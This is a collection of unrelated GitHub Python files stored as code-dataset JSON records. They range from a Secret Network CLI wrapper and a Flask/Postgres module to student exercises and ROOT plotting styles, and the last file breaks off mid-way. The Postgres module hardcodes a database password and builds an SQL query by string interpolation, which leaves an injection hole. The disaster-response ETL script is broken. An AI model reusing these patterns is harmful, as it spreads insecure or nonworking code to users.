)\n","repo_name":"yzwjy25/Django-Blog","sub_path":"web/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37384119286","text":"from RagnarokDatabase.models import MVP\nimport csv\n\ndef run():\n fhand= open('RagnarokDatabase/scripts/Lista MVP.csv')\n reader = csv.reader(fhand)\n next(reader) # Avanza más allá de las cabeceras\n\n # Aquí el ejemplo borra los items con app.models.all().delete()\n\n for row in reader:\n print(row)\n #b, created = MVP.objects.get_or_create(name=row[1])\n c = MVP(name=row[0])\n c.save()\n print('MVP Database Update Done!')","repo_name":"RomeroRodriguezD/RagnarokMVPKillsDatabase","sub_path":"RagnarokDatabase/scripts/csvreaderexample.py","file_name":"csvreaderexample.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"22950754901","text":"import os\nimport json\nimport subprocess\nfrom shutil import copyfile\nfrom subprocess import PIPE, run as subprocess_run\nfrom typing import List, Dict\n\nfrom src.contracts.secret.secret_contract import swap_json\nfrom src.util.config import Config\nfrom src.util.logger import get_logger\n\nlogger = get_logger(logger_name=\"SecretCLI\")\n\n\ndef query_encrypted_error(tx_hash: str):\n cmd = ['secretcli', 'q', 'compute', 'tx', tx_hash]\n resp = run_secret_cli(cmd)\n\n resp_json = json.loads(resp)\n return resp_json[\"output_error\"]\n\n\ndef sign_tx(unsigned_tx_path: str, multi_sig_account_addr: str, account_name: str):\n cmd = ['secretcli', 'tx', 'sign', unsigned_tx_path, '--signature-only', '--multisig',\n multi_sig_account_addr, '--from', account_name]\n\n return run_secret_cli(cmd)\n\n\ndef multisig_tx(unsigned_tx_path: str, multi_sig_account_name: str, *signed_tx):\n cmd = ['secretcli', 'tx', 'multisign', unsigned_tx_path, multi_sig_account_name] + list(signed_tx)\n\n return run_secret_cli(cmd)\n\n\ndef create_unsigned_tx(secret_contract_addr: str, transaction_data: Dict, chain_id: str, enclave_key: str,\n code_hash: str, multisig_acc_addr: str) -> str:\n cmd = ['secretcli', 'tx', 'compute', 'execute', secret_contract_addr, f\"{json.dumps(transaction_data)}\",\n '--generate-only', '--chain-id', f\"{chain_id}\", '--enclave-key', enclave_key, '--code-hash',\n code_hash, '--from', multisig_acc_addr]\n return run_secret_cli(cmd)\n\n\ndef broadcast(signed_tx_path: str) -> str:\n cmd = ['secretcli', 'tx', 'broadcast', signed_tx_path]\n return run_secret_cli(cmd)\n\n\ndef decrypt(data: str) -> str:\n cmd = ['secretcli', 'query', 'compute', 'decrypt', data]\n return run_secret_cli(cmd)\n\n\ndef query_scrt_swap(nonce: int, contract_addr: str) -> str:\n query_str = swap_json(nonce)\n cmd = ['secretcli', 'query', 'compute', 'query', contract_addr, f\"{query_str}\"]\n p = subprocess_run(cmd, stdout=PIPE, stderr=PIPE, check=True)\n return p.stdout.decode()\n\n\ndef query_tx(tx_hash: str):\n cmd = ['secretcli', 'query', 'tx', tx_hash]\n return run_secret_cli(cmd)\n\n\ndef query_data_success(tx_hash: str):\n \"\"\" This command is used to test success of transactions - so we can safely ignore any errors and assume in any case\n that means the tx isn't on-chain\n \"\"\"\n cmd = ['secretcli', 'query', 'compute', 'tx', tx_hash]\n try:\n resp = run_secret_cli(cmd)\n return json.loads(json.loads(resp)[\"output_data_as_string\"])\n except (RuntimeError, json.JSONDecodeError, KeyError):\n return {}\n\n\ndef 
run_secret_cli(cmd: List[str]) -> str:\n \"\"\"\n\n \"\"\"\n try:\n logger.debug(f'Running command: {cmd}')\n p = subprocess.run(cmd, stdout=PIPE, stderr=PIPE, check=True)\n except subprocess.CalledProcessError as e:\n logger.error(f'Failed: stderr: {e.stderr.decode()}, stdout: {e.stdout.decode()}')\n raise RuntimeError(e.stdout.decode()) from None\n\n logger.debug('Success')\n return p.stdout.decode()\n\n\ndef configure_secretcli(config: Config): # pylint: disable=too-many-statements\n\n # check if cli is already set up:\n cmd = ['secretcli', 'keys', 'list']\n result = run_secret_cli(cmd)\n if result.strip() != '[]': # sometimes \\n is added to the result\n logger.info(f\"{result}\")\n logger.info(\"CLI already set up\")\n return\n\n cmd = ['secretcli', 'config', 'output', 'json']\n\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'indent', 'true']\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'trust-node', 'true']\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'node', config['secret_node']]\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'chain-id', config['chain_id']]\n run_secret_cli(cmd)\n cmd = ['secretcli', 'config', 'keyring-backend', 'test']\n run_secret_cli(cmd)\n\n # set up multisig\n signers = []\n for i, key in enumerate(config[\"secret_signers\"]):\n cmd = ['secretcli', 'keys', 'add', f'ms_signer{i}', f'--pubkey={key}']\n signers.append(f'ms_signer{i}')\n run_secret_cli(cmd)\n\n cmd = ['secretcli', 'keys', 'add', f'{config[\"multisig_key_name\"]}', f\"--multisig={','.join(signers)}\",\n '--multisig-threshold', f'{config[\"signatures_threshold\"]}']\n run_secret_cli(cmd)\n\n logger.debug(f'importing private key from {config[\"secret_key_file\"]} with name {config[\"secret_key_name\"]}')\n\n # import key\n key_path = os.path.join(f'{config[\"KEYS_BASE_PATH\"]}', f'{config[\"secret_key_file\"]}')\n cmd = ['secretcli', 'keys', 'import', f'{config[\"secret_key_name\"]}',\n f'{key_path}']\n process = subprocess.Popen(cmd,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n inputdata = config[\"secret_key_password\"]\n _, stderrdata = process.communicate(input=(inputdata+\"\\n\").encode())\n\n if stderrdata:\n logger.error(f\"Error importing secret key: {stderrdata}\")\n raise EnvironmentError\n\n logger.debug(\"copying transaction key..\")\n # copy transaction key from shared location\n src_key_path = os.path.join(f'{config[\"KEYS_BASE_PATH\"]}', 'id_tx_io.json')\n dst_key_path = os.path.join(f'{config[\"SECRETCLI_HOME\"]}', 'id_tx_io.json')\n copyfile(src_key_path, dst_key_path)\n\n # test configuration\n cmd = ['secretcli', 'query', 'account', config['multisig_acc_addr']]\n run_secret_cli(cmd)\n\n #\n cmd = ['secretcli', 'query', 'register', 'secret-network-params']\n run_secret_cli(cmd)\n","repo_name":"levackt/EthereumBridge","sub_path":"src/util/secretcli.py","file_name":"secretcli.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29349417644","text":"def add(a,b):\n \"\"\"\n Realiza a soma de dois numeros\n @author: Marcos Vinicius\n \"\"\"\n return a+b\n\ndef maior(a,b):\n \"\"\"\n Realiza a comparacao entre dois numeros\n @author: Marcos Vinicius\n \"\"\"\n if a>b:\n return a\n return b\n\ndef soma(lista, x=0):\n \"\"\"\n Realiza a soma da lista com o elemento x\n @author: Marcos Vinicius\n \"\"\"\n somador = 0\n\n for elemento in lista:\n somador+=elemento\n \n return somador+x\n\ndef media(lista):\n \"\"\"\n Realiza 
a media da lista\n @author: Marcos Vinicius\n \"\"\"\n contador=0 \n somador=0\n\n for elemento in lista:\n somador+=elemento\n contador+=1\n\n return (somador/contador) \ndef valoresIguais(lista1, lista2):\n \"\"\"\n Realiza a comparacao entre duas listas\n retorna os elementos iguais \n @author: Marcos Vinicius\n \"\"\"\n retornoLista = []\n for elLista1 in lista1:\n for elLista2 in lista2:\n if elLista1==elLista2:\n retornoLista.append(elLista1)\n return retornoLista\n\ndef indice_prim_valor_igual(lista1,lista2):\n \"\"\"\n Realiza a comparacao entre duas listas\n retorna o indice do elemento igual \n @author: Marcos Vinicius\n \"\"\"\n x = -1\n for elLista1 in lista1:\n for elLista2 in lista2:\n if elLista1==elLista2:\n x = lista1.index(elLista1)\n if x >= 0:\n return x\n \n return None\n\nif __name__ == \"__main__\":\n x = add(2,3)\n print(\"Soma: \"+str(x))\n\n #Maior \n x = maior(2,3)\n print(\"Maior: \" +str(x))\n\n #Soma numeros\n listaDeNumeros = [1,2,3,4,5,6]\n x = soma(listaDeNumeros, 6)\n print(\"Soma da lista: \" +str(x))\n\n #Media numeros\n listaDeNumeros = [1,2,3,6]\n x = media(listaDeNumeros)\n print(\"Media: \" + str(x))\n\n #Valores iguais\n listaDeNumeros1 = [1,5,7,8]\n listaDeNumeros2 = [5,8,7,10,11]\n listaIguais = []\n listaIguais = valoresIguais(listaDeNumeros1, listaDeNumeros2)\n print(\"Iguais: \" + str(listaIguais))\n\n #Indice primeiro valor igual\n listaDeNumeros1 = [13,9,3,1,14]\n listaDeNumeros2 = [5,8,7,10,11]\n indiceIgual = indice_prim_valor_igual(listaDeNumeros1,listaDeNumeros2)\n print(\"Indice: \" + str(indiceIgual))","repo_name":"MarVinReisSantos/exercicios-frontend-CEFET","sub_path":"4 Bimestre/Exercicio 1/codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15750337750","text":"from .from_list_connector import FromListConnector\nimport os\nimport numpy\nfrom six import string_types\nfrom pyNN.connectors import FromFileConnector as PyNNFromFileConnector\nfrom pyNN.recording import files\n\n\nclass FromFileConnector(FromListConnector, PyNNFromFileConnector):\n # pylint: disable=redefined-builtin\n __slots__ = [\"_file\"]\n\n def __init__(\n self, file, # @ReservedAssignment\n distributed=False, safe=True, callback=None, verbose=False):\n self._file = file\n if isinstance(file, string_types):\n real_file = self.get_reader(file)\n try:\n conn_list = self._read_conn_list(real_file, distributed)\n finally:\n real_file.close()\n else:\n conn_list = self._read_conn_list(file, distributed)\n\n column_names = self.get_reader(self._file).get_metadata().get(\n 'columns')\n if column_names is not None:\n column_names = [column for column in column_names\n if column not in (\"i\", \"j\")]\n\n # pylint: disable=too-many-arguments\n FromListConnector.__init__(\n self, conn_list, safe=safe, verbose=verbose,\n column_names=column_names, callback=callback)\n PyNNFromFileConnector.__init__(\n self, file=file, distributed=distributed, safe=safe,\n callback=callback)\n\n def _read_conn_list(self, the_file, distributed):\n if not distributed:\n return the_file.read()\n filename = \"{}.\".format(os.path.basename(the_file.file))\n\n conns = list()\n for found_file in os.listdir(os.path.dirname(the_file.file)):\n if found_file.startswith(filename):\n file_reader = self.get_reader(found_file)\n try:\n conns.append(file_reader.read())\n finally:\n file_reader.close()\n return numpy.concatenate(conns)\n\n def __repr__(self):\n return 
\"FromFileConnector({})\".format(self._file)\n\n def get_reader(self, file): # @ReservedAssignment\n \"\"\" Get a file reader object using the PyNN methods.\n\n :return: A pynn StandardTextFile or similar\n \"\"\"\n return files.StandardTextFile(file, mode=\"r\")\n","repo_name":"apdavison/sPyNNaker8","sub_path":"spynnaker8/models/connectors/from_file_connector.py","file_name":"from_file_connector.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"39969642382","text":"def TestError(d):\n try:\n print('正常结果:',8/d)\n except:\n print('这是异常!!!')\n else:\n print('其他异常!')\n finally:\n print('这是finally')\n\ni=4\nwhile(i>=0):\n TestError(i)\n i-=2\n\n\nwhile True:\n s=input('请输入一个整数:')\n try:\n i=int(s)\n i=8/i\n\n except ValueError:\n print('确认输入的是数字!')\n except ZeroDivisionError:\n print('不能输入0!')\n\n# except(ValueError,ZeroDivisionError) as err:\n# print(err)\n else:\n print('正确!')","repo_name":"hurricaney/PythonStart","sub_path":"PythonApplication1/Data/TryCatch.py","file_name":"TryCatch.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33568642122","text":"\"\"\"\r\nThis problem was asked by Microsoft.\r\nImplement a URL shortener with the following methods:\r\nshorten(url), which shortens the url into a six-character alphanumeric string, such as zLg6wl.\r\nrestore(short), which expands the shortened string into the original url. If no such shortened string exists, return null.\r\nHint: What if we enter the same URL twice?\r\n\"\"\"\r\nimport requests\r\nfrom random import choice\r\n\r\n\r\nclass URLShortener(dict):\r\n\r\n shortened_url_characters = \"aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ1234567890\"\r\n max_urls = 10000000 # Some max, should be based on length of shortened_url_characters\r\n\r\n def __init__(self, prefix, *args, **kwargs):\r\n self.prefix = prefix\r\n\r\n def __call__(self, url):\r\n return self.shorten(url)\r\n\r\n def shorten(self, url):\r\n if len(self) >= self.max_urls:\r\n raise ValueError(\"This URLShortener is full! 
no more URLs can be shortened based on the allowed characters.\")\r\n if url in self.values():\r\n return next(short for short, previous_url in self.items() if previous_url == url)\r\n shortened_url = \"\"\r\n while not shortened_url or shortened_url in self:\r\n shortened_url = \"\".join(choice(self.shortened_url_characters) for _ in range(6))\r\n self[shortened_url] = url\r\n return shortened_url\r\n\r\n def restore(self, short):\r\n return self.get(short)\r\n\r\n def deactivate(self, short):\r\n return self.pop(short)\r\n\r\n def full_shortened_url(self, short):\r\n return \"{prefix}/{short}\".format(prefix=self.prefix, short=short)\r\n\r\n def redirect(self, short):\r\n try:\r\n return requests.get(self.full_shortened_url(short))\r\n except requests.exceptions.ConnectionError:\r\n pass\r\n\r\n\r\nurl_shortener = URLShortener(\"https://goo.gl.com\")\r\nshort = url_shortener(\"https://www.facebook.com/\")\r\nprint(short)\r\nshort = url_shortener(\"https://www.facebook.com/\")\r\nprint(short)\r\nprint(url_shortener.full_shortened_url(short))\r\nfull = url_shortener.restore(short)\r\nprint(full)\r\nfacebook = url_shortener.redirect(full)\r\nprint(facebook)\r\nurl_shortener.deactivate(short)\r\nprint(short in url_shortener)\r\n","repo_name":"joe-bethke/daily-coding-problems","sub_path":"DCP-55-20190310.py","file_name":"DCP-55-20190310.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21990734259","text":"from tkinter import *\n\nclass BotonGuardar(Frame):\n def __init__(self, master):\n Frame.__init__(self, master)\n\n # Atributos de la clase\n self.configuracion = None\n self.lista_opciones = []\n\n # Configuraciones del frame\n self.config(\n bg=\"#2c2b33\",\n width=370,\n height=50\n )\n\n # Partes del programa\n self.boton = Button(self, text=\"Guardar\", command=self.guardar_configuracion)\n self.separador = Label(self, text=\"\")\n\n # Configuración de estilo del objeto\n self.boton.config(\n fg=\"white\",\n borderwidth=0,\n bg=\"cadetblue\"\n )\n\n self.separador.config(\n bg=\"#2c2b33\"\n )\n\n # posicionamiento de los objetos\n self.boton.place(x=160, y=9)\n \n def enviar_configuracion(self, configuracion):\n self.configuracion = configuracion\n \n # Enviamos los objetos combobox al frame\n def enviar_lista_opciones(self, lista_opciones):\n self.lista_opciones.append(lista_opciones)\n \n def guardar_configuracion(self):\n self.configuracion.modificar_modo_ordenamiento(self.lista_opciones[0].get())\n self.configuracion.modificar_algoritmo(self.lista_opciones[1].get())\n self.configuracion.modificar_criterio(self.lista_opciones[2].get())","repo_name":"LimbersMay/AppOrdenadorFicheros","sub_path":"ventana_config/boton_guardar.py","file_name":"boton_guardar.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39862593830","text":"CFG = {\n \"data_path\": \"../cmfd_forge_train/\",\n \"kwargs\": {\"num_workers\": 4},\n \"batch_size\": 128,\n \"epoch\": 25,\n \"lr\": 1e-3,\n \"momentum\": 0.9,\n \"log_interval\": 10,\n \"l2_decay\": 0,\n \"lambda\": 10,\n \"backbone\": \"alexnet\",\n \"n_class\": 2,\n}\n","repo_name":"AKASH2907/Forgery-Classification-via-Domain-Adaptation","sub_path":"DDC_DeepCoral/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} 
+{"seq_id":"16045645867","text":"import nltk #for natural language processing \nnltk.download(['punkt', 'wordnet', 'averaged_perceptron_tagger'])\n\nimport re\nimport numpy as np\nimport pandas as pd\n\n#nltk pakages \nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n\n#sklearn pakages\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n engine = create_engine('sqlite:///etl_df.db')\n df =pd.read_sql_table('etl_df',engine)\n X = df['message']\n y= df.iloc[:, 4:]\n print(X.head(5))\npass\n\n\ndef clean_data(df):\n df = pd.merge(messages,categories)\n df.head()\n categories = df[\"categories\"].str.split(\";\", n=36, expand=True)\n categories.head()\n row = categories.iloc[0]\n category_colnames = row.apply(lambda x: x[:-2])\n print(category_colnames)\n categories.columns = category_colnames\n categories.head()\n for column in categories:\n # set each value to be the last character of the string\n categories[column] = categories[column].str[-1]\n \n # convert column from string to numeric\n categories[column] = pd.to_numeric(categories[column])\n categories.head()\n\n df.drop('categories',axis = 1, inplace = True)\n df.head(7)\n frames = [df,categories]\n df = pd.concat(frames, axis=1)\n df.head()\n df[\"is_duplicate\"]= df.duplicated()\n print(df.head())\n df.drop_duplicates(subset='id', inplace=True)\n df[\"is_duplicate\"]= df.duplicated()\n print(df.tail())\n return df\npass;\ndef save_data(df, database_filename):\n from sqlalchemy import create_engine\n engine = create_engine('sqlite:///etl_df.db')\n df.to_sql('etl_df', engine, index=False)\npass\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. 
\\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n if __name__ == '__main__':\n main()\n","repo_name":"sadhukruz/Disaster-response-pipeline","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24646189363","text":"from psycopg2 import pool\nfrom psycopg2.extras import RealDictCursor\nimport logging\n\n# -----\nimport psycopg2\nfrom sqlalchemy import create_engine\nimport csv\n\n\nengine = create_engine('postgresql+psycopg2://postgres:Testing123@dbservice:5432/postgres')\nconn = engine.connect()\ntry:\n conn.execute(\"CREATE database IF NOT EXISTS test1\")\n conn.execute(\"commit\")\nexcept Exception as e:\n print(e)\nfinally:\n conn.close()\n\n# copy csv to postgres\nconn = psycopg2.connect(database=\"test\", user=\"postgres\", password=\"Testing123\", host=\"dbservice\", port=\"5432\")\ncursor = conn.cursor()\n\n# create table\ncursor.execute(\"CREATE TABLE IF NOT EXISTS countries (id serial PRIMARY KEY, country varchar(200), alpha2 char(30), alpha3 char(30), nuCode int, latitude float, longitude float)\")\n# copy data from csv to table\nwith open('countries.csv', newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n cursor.execute(\"INSERT INTO countries (country, alpha2, alpha3, nuCode, latitude, longitude) VALUES (%s, %s, %s, %s, %s, %s)\", (row['Country'], row['Alpha2_code'], row['Alpha3_code'], row['Numeric_code'], row['Latitude'], row['Longitude']))\nconn.commit()\nconn.close()\n# ---\n\ntry: \n connection_pool = pool.SimpleConnectionPool(1, 5, host=\"dbservice\", port=5432,\n database=\"test\",\n user=\"postgres\",\n password=\"Testing123\")\nexcept Exception as e:\n connection_pool = None\n logging.info(str(e))\n\"\"\"\nQueries \n\"SELECT * from countries limit 10;\"\n\n\"SELECT * from countries WHERE id = {id}\n\"\"\"\n\ndef get_top_10():\n if connection_pool != None:\n conn = connection_pool.getconn()\n values = None\n with conn.cursor(cursor_factory=RealDictCursor) as cursor:\n cursor.execute(\"SELECT * from countries limit 10;\")\n values = cursor.fetchall()\n connection_pool.putconn(conn)\n return values\n return {\"error\":\"conneting to db\"}\n\ndef get_one_country(id_):\n if connection_pool != None:\n conn = connection_pool.getconn()\n values = None\n with conn.cursor(cursor_factory=RealDictCursor) as cursor:\n values = cursor.execute(f\"SELECT * from countries WHERE id = {id_}\")\n values = cursor.fetchall()\n connection_pool.putconn(conn)\n return values\n return {\"error\":\"conneting to db\"}","repo_name":"curiouscat22/flask-ex","sub_path":"api/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31631618846","text":"import ROOT\n\n#############################################\n# ROOT styles (High tau pT analysis) #\n# Author : Alexei Raspereza (December 2022) #\n#############################################\n\neraLumiLabel = {\n \"UL2016\" : \"2016, 36.3 fb^{-1} (13TeV)\",\n \"UL2016_postVFP\" : \"2016 postVFP, 16.8 fb^{-1} (13 TeV)\",\n \"UL2016_preVFP\" : \"2016 preVFP, 19.5 fb^{-1} (13TeV)\",\n \"UL2017\" : \"2017, 41.5 fb^{-1} (13TeV)\",\n \"UL2018\" : \"2018, 59.8 fb^{-1} (13TeV)\"\n}\n\ndef InitROOT():\n\n ROOT.TH1.SetDefaultSumw2(True)\n ROOT.TH2.SetDefaultSumw2(True)\n 
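# batch mode: canvases are rendered off-screen instead of opening GUI windows (safe on headless nodes)\n    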
ROOT.gROOT.SetBatch(True)\n\n\ndef SetStyle():\n\n HttStyle = ROOT.TStyle(\"HttStyle\",\"High pT analysis : ROOT Styles -)\")\n ROOT.gStyle = HttStyle\n HttStyle.SetOptStat(0000)\n HttStyle.SetOptFit(0000) \n\n # Canvas\n HttStyle.SetCanvasColor (0)\n HttStyle.SetCanvasBorderSize(10)\n HttStyle.SetCanvasBorderMode(0)\n HttStyle.SetCanvasDefH (700)\n HttStyle.SetCanvasDefW (700)\n HttStyle.SetCanvasDefX (100)\n HttStyle.SetCanvasDefY (100)\n\n # pads\n HttStyle.SetPadColor (0)\n HttStyle.SetPadBorderSize (10)\n HttStyle.SetPadBorderMode (0)\n HttStyle.SetPadBottomMargin(0.15)\n HttStyle.SetPadTopMargin (0.08)\n HttStyle.SetPadLeftMargin (0.18)\n HttStyle.SetPadRightMargin (0.05)\n HttStyle.SetPadGridX (0)\n HttStyle.SetPadGridY (0)\n HttStyle.SetPadTickX (1)\n HttStyle.SetPadTickY (1)\n\n # Frames\n HttStyle.SetLineWidth(3)\n HttStyle.SetFrameFillStyle ( 0)\n HttStyle.SetFrameFillColor ( 0)\n HttStyle.SetFrameLineColor ( 1)\n HttStyle.SetFrameLineStyle ( 0)\n HttStyle.SetFrameLineWidth ( 2)\n HttStyle.SetFrameBorderSize(10)\n HttStyle.SetFrameBorderMode( 0)\n\n # Histograms\n HttStyle.SetHistFillColor(2)\n HttStyle.SetHistFillStyle(0)\n HttStyle.SetHistLineColor(1)\n HttStyle.SetHistLineStyle(0)\n HttStyle.SetHistLineWidth(3)\n HttStyle.SetNdivisions(505)\n\n # Functions\n HttStyle.SetFuncColor(1)\n HttStyle.SetFuncStyle(0)\n HttStyle.SetFuncWidth(2)\n\n # Various\n HttStyle.SetMarkerStyle(20)\n HttStyle.SetMarkerColor(ROOT.kBlack)\n HttStyle.SetMarkerSize (1.4)\n\n HttStyle.SetTitleBorderSize(0)\n HttStyle.SetTitleFillColor (0)\n HttStyle.SetTitleX (0.2)\n\n HttStyle.SetTitleSize (0.055,\"X\")\n HttStyle.SetTitleOffset(1.200,\"X\")\n HttStyle.SetLabelOffset(0.005,\"X\")\n HttStyle.SetLabelSize (0.050,\"X\")\n HttStyle.SetLabelFont (42 ,\"X\")\n\n HttStyle.SetStripDecimals(False)\n HttStyle.SetLineStyleString(11,\"20 10\")\n\n HttStyle.SetTitleSize (0.055,\"Y\")\n HttStyle.SetTitleOffset(1.600,\"Y\")\n HttStyle.SetLabelOffset(0.010,\"Y\")\n HttStyle.SetLabelSize (0.050,\"Y\")\n HttStyle.SetLabelFont (42 ,\"Y\")\n\n HttStyle.SetTextSize (0.055)\n HttStyle.SetTextFont (42)\n\n HttStyle.SetStatFont (42)\n HttStyle.SetTitleFont (42)\n HttStyle.SetTitleFont (42,\"X\")\n HttStyle.SetTitleFont (42,\"Y\")\n\n HttStyle.SetOptStat (0)\n\n ROOT.gStyle = HttStyle\n\ndef MakeCanvas(name,title,dX,dY):\n\n # Create canvas\n canvas = ROOT.TCanvas(name,title,dX,dY)\n canvas.SetFillColor (0)\n canvas.SetBorderMode (0)\n canvas.SetBorderSize (10)\n\n # Set margins to reasonable defaults\n canvas.SetLeftMargin (0.18)\n canvas.SetRightMargin (0.05)\n canvas.SetTopMargin (0.08)\n canvas.SetBottomMargin (0.15)\n\n # Setup a frame which makes sense\n canvas.SetFrameFillStyle (0)\n canvas.SetFrameLineStyle (0)\n canvas.SetFrameBorderMode(0)\n canvas.SetFrameBorderSize(10)\n canvas.SetFrameFillStyle (0)\n canvas.SetFrameLineStyle (0)\n canvas.SetFrameBorderMode(0)\n canvas.SetFrameBorderSize(10)\n \n return canvas\n\ndef InitModel(hist,color):\n hist.SetFillStyle(0)\n hist.SetLineStyle(1)\n hist.SetLineWidth(2)\n hist.SetLineColor(color)\n hist.SetMarkerStyle(0)\n hist.SetMarkerSize(0)\n hist.SetMarkerColor(0)\n \n\ndef InitHist(hist, xtit, ytit, color, style):\n hist.SetXTitle(xtit)\n hist.SetYTitle(ytit)\n hist.SetLineColor(ROOT.kBlack)\n hist.SetLineWidth( 2)\n hist.SetFillColor(color )\n hist.SetFillStyle(style )\n hist.SetTitleSize (0.055,\"Y\")\n hist.SetTitleOffset(1.200,\"Y\")\n hist.SetLabelOffset(0.014,\"Y\")\n hist.SetLabelSize (0.040,\"Y\")\n hist.SetLabelFont (42 ,\"Y\")\n hist.SetTitleSize 
(0.055,\"X\")\n hist.SetTitleOffset(1.300,\"X\")\n hist.SetLabelOffset(0.014,\"X\")\n hist.SetLabelSize (0.050,\"X\")\n hist.SetLabelFont (42 ,\"X\")\n hist.SetMarkerStyle(20)\n hist.SetMarkerColor(color)\n hist.SetMarkerSize (0.6)\n hist.GetYaxis().SetTitleFont(42)\n hist.GetXaxis().SetTitleFont(42)\n hist.SetTitle(\"\") \n\ndef InitTotalHist(hist):\n hist.SetFillStyle(3013);\n hist.SetFillColor(1);\n hist.SetMarkerStyle(21);\n hist.SetMarkerSize(0);\n\ndef InitData(hist):\n hist.SetMarkerStyle(20)\n hist.SetMarkerSize(1.3)\n hist.SetLineWidth(2)\n\ndef InitRatioHist(hist):\n hist.GetXaxis().SetLabelOffset(0.04)\n hist.GetXaxis().SetLabelSize(0.14)\n hist.GetXaxis().SetTitleSize(0.13)\n hist.GetXaxis().SetTitleOffset(1.2)\n hist.GetYaxis().SetLabelFont(42)\n hist.GetYaxis().SetLabelOffset(0.015)\n hist.GetYaxis().SetLabelSize(0.13)\n hist.GetYaxis().SetTitleSize(0.14)\n hist.GetYaxis().SetTitleOffset(0.5)\n hist.GetXaxis().SetTickLength(0.07)\n hist.GetYaxis().SetTickLength(0.04)\n hist.GetYaxis().SetLabelOffset(0.01)\n hist.GetYaxis().SetNdivisions(505)\n\ndef SetLegendStyle(leg): \n leg.SetFillStyle (0)\n leg.SetFillColor (0)\n leg.SetBorderSize(0)\n\ndef InitUpperPad(pad):\n pad.SetFillColor(0)\n pad.SetBorderMode(0)\n pad.SetBorderSize(10)\n pad.SetTickx(1)\n pad.SetTicky(1)\n pad.SetLeftMargin(0.17)\n pad.SetRightMargin(0.05)\n pad.SetBottomMargin(0.02)\n pad.SetFrameFillStyle(0)\n pad.SetFrameLineStyle(0)\n pad.SetFrameLineWidth(2)\n pad.SetFrameBorderMode(0)\n pad.SetFrameBorderSize(10)\n pad.SetFrameFillStyle(0)\n pad.SetFrameLineStyle(0)\n pad.SetFrameLineWidth(2)\n pad.SetFrameBorderMode(0)\n pad.SetFrameBorderSize(10)\n\ndef InitLowerPad(pad):\n pad.SetFillColor(0)\n pad.SetBorderMode(0)\n pad.SetBorderSize(10)\n pad.SetGridy()\n pad.SetTickx(1)\n pad.SetTicky(1)\n pad.SetLeftMargin(0.17)\n pad.SetRightMargin(0.05)\n pad.SetTopMargin(0.026)\n pad.SetBottomMargin(0.35)\n pad.SetFrameFillStyle(0)\n pad.SetFrameLineStyle(0)\n pad.SetFrameLineWidth(2)\n pad.SetFrameBorderMode(0)\n pad.SetFrameBorderSize(10)\n pad.SetFrameFillStyle(0)\n pad.SetFrameLineStyle(0)\n pad.SetFrameLineWidth(2)\n pad.SetFrameBorderMode(0)\n pad.SetFrameBorderSize(10)\n\ndef CMS_label(pad,**kwargs):\n\n iPeriod = kwargs.get('Period',4)\n iPosX = kwargs.get('PosX',33)\n writeExtraText = kwargs.get('writeExtraText',True)\n era = kwargs.get('era',\"UL2018\")\n extraText = kwargs.get('extraText',\"Internal\")\n\n lumiText = eraLumiLabel[era]\n\n extraTextFont = 52 #\n\n cmsText = \"CMS\"\n cmsTextFont = 61 # default is helvetic-bold\n\n # text sizes and text offsets with respect to the top frame\n # in unit of the top margin size\n lumiTextSize = 0.6\n lumiTextOffset = 